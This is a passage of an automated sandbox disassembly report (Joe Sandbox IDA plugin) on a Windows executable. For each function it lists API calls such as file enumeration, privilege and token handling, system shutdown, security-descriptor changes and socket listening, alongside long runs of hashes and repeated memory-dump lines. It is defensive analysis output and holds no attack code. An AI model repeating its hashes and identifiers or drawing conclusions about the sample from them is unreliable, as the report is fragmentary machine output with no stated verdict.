          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
          • String ID:
          • API String ID: 2383988440-0
          • Opcode ID: a02ba1151abe292cc3a7b654ec5ae7ebf7ac7de696ec4f3ac1ddf55e679d711b
          • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
          • Opcode Fuzzy Hash: a02ba1151abe292cc3a7b654ec5ae7ebf7ac7de696ec4f3ac1ddf55e679d711b
          • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
          APIs
          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
          • FindClose.KERNEL32(00000000), ref: 00478924
          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
          • __swprintf.LIBCMT ref: 004789D3
          • __swprintf.LIBCMT ref: 00478A1D
          • __swprintf.LIBCMT ref: 00478A4B
          • __swprintf.LIBCMT ref: 00478A79
            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
          • __swprintf.LIBCMT ref: 00478AA7
          • __swprintf.LIBCMT ref: 00478AD5
          • __swprintf.LIBCMT ref: 00478B03
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
          • API String ID: 999945258-2428617273
          • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
          • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
          • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
          • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
          APIs
            • Part of subcall function 00443D19: _wcslen.LIBCMT ref: 00443D34
          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00464F2A
          • GetLastError.KERNEL32 ref: 00464F40
          • GetCurrentThread.KERNEL32(00000028,00000000,?), ref: 00464F54
          • OpenThreadToken.ADVAPI32(00000000), ref: 00464F5B
          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00464F6C
          • OpenProcessToken.ADVAPI32(00000000), ref: 00464F73
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
          • String ID: SeDebugPrivilege
          • API String ID: 1312810259-2896544425
          • Opcode ID: 756545d07b68cf9bb0e28bd2dca9e10004d37f1bd93fbff77c304a7c764c4f3b
          • Instruction ID: 6ee098d93b5c3ece286c9d7df0f89eb4f2932b8b97d60c134c5a8e1830bdbe8f
          • Opcode Fuzzy Hash: 756545d07b68cf9bb0e28bd2dca9e10004d37f1bd93fbff77c304a7c764c4f3b
          • Instruction Fuzzy Hash: E1519372204301AFE710EF64DC85F6BB7E8AB84705F10491EFA44DB2C1D7B5E8058BAA
          APIs
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
          • __wsplitpath.LIBCMT ref: 00403492
            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
          • _wcscpy.LIBCMT ref: 004034A7
          • _wcscat.LIBCMT ref: 004034BC
          • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
          • _wcscpy.LIBCMT ref: 004035A0
          • _wcslen.LIBCMT ref: 00403623
          • _wcslen.LIBCMT ref: 0040367D
          Strings
          • Unterminated string, xrefs: 00428348
          • _, xrefs: 0040371C
          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
          • Error opening the file, xrefs: 00428231
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
          • API String ID: 3393021363-188983378
          • Opcode ID: bc603dd1aeee803ba09bb11c82a13b92d6e84c0d3e5604b5e73ac53d7ef023d6
          • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
          • Opcode Fuzzy Hash: bc603dd1aeee803ba09bb11c82a13b92d6e84c0d3e5604b5e73ac53d7ef023d6
          • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
          APIs
          • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
          • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
          • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
          • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
          • FindClose.KERNEL32(00000000), ref: 00431B20
          • FindClose.KERNEL32(00000000), ref: 00431B34
          • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
          • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
          • FindClose.KERNEL32(00000000), ref: 00431BCD
          • FindClose.KERNEL32(00000000), ref: 00431BDB
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
          • String ID: *.*
          • API String ID: 1409584000-438819550
          • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
          • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
          • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
          • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
          APIs
          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
          • __swprintf.LIBCMT ref: 00431C2E
          • _wcslen.LIBCMT ref: 00431C3A
          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
          • String ID: :$\$\??\%s
          • API String ID: 2192556992-3457252023
          • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
          • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
          • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
          • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
          APIs
          • GetLocalTime.KERNEL32(?), ref: 004722A2
          • __swprintf.LIBCMT ref: 004722B9
          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: FolderPath$LocalTime__swprintf
          • String ID: %.3d
          • API String ID: 3337348382-986655627
          • Opcode ID: 73cadbc5aabbc7add5dcfb8212345a9bfe8b81504afb76c484b5326fd8d60050
          • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
          • Opcode Fuzzy Hash: 73cadbc5aabbc7add5dcfb8212345a9bfe8b81504afb76c484b5326fd8d60050
          • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
          APIs
          • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
          • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
          • FindClose.KERNEL32(00000000), ref: 0044291C
          • FindClose.KERNEL32(00000000), ref: 00442930
          • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
          • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
          • FindClose.KERNEL32(00000000), ref: 004429D4
            • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
          • FindClose.KERNEL32(00000000), ref: 004429E2
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
          • String ID: *.*
          • API String ID: 2640511053-438819550
          • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
          • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
          • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
          • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
          APIs
          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
          • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
          • GetLastError.KERNEL32 ref: 00433414
          • ExitWindowsEx.USER32(?,00000000), ref: 00433437
          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
          • SetSystemPowerState.KERNEL32 ref: 00433479
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
          • String ID: SeShutdownPrivilege
          • API String ID: 2938487562-3733053543
          • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
          • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
          • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
          • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
          APIs
            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
            • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
            • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
          • GetLengthSid.ADVAPI32(?), ref: 004461D0
          • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
          • GetLengthSid.ADVAPI32(?), ref: 00446241
          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
          • CopySid.ADVAPI32(00000000), ref: 00446271
          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
          • String ID:
          • API String ID: 1255039815-0
          • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
          • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
          • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
          • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
          APIs
          • __swprintf.LIBCMT ref: 00433073
          • __swprintf.LIBCMT ref: 00433085
          • __wcsicoll.LIBCMT ref: 00433092
          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
          • LoadResource.KERNEL32(?,00000000), ref: 004330BD
          • LockResource.KERNEL32(00000000), ref: 004330CA
          • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
          • LoadResource.KERNEL32(?,00000000), ref: 00433105
          • SizeofResource.KERNEL32(?,00000000), ref: 00433114
          • LockResource.KERNEL32(?), ref: 00433120
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
          • String ID:
          • API String ID: 1158019794-0
          • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
          • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
          • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
          • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
          • String ID:
          • API String ID: 1737998785-0
          • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
          • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
          • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
          • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
          APIs
          • SetErrorMode.KERNEL32(00000001), ref: 0045D627
          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
          • GetLastError.KERNEL32 ref: 0045D6BF
          • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Error$Mode$DiskFreeLastSpace
          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
          • API String ID: 4194297153-14809454
          • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
          • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
          • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
          • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
          APIs
          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
          • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
          • bind.WSOCK32(00000000,?,00000010), ref: 00465356
          • WSAGetLastError.WSOCK32(00000000), ref: 00465363
          • closesocket.WSOCK32(00000000,00000000), ref: 00465377
          • listen.WSOCK32(00000000,00000005), ref: 00465381
          • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
          • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorLast$closesocket$bindlistensocket
          • String ID:
          • API String ID: 540024437-0
          • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
          • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
          • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
          • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
          Strings
          Memory Dump Source
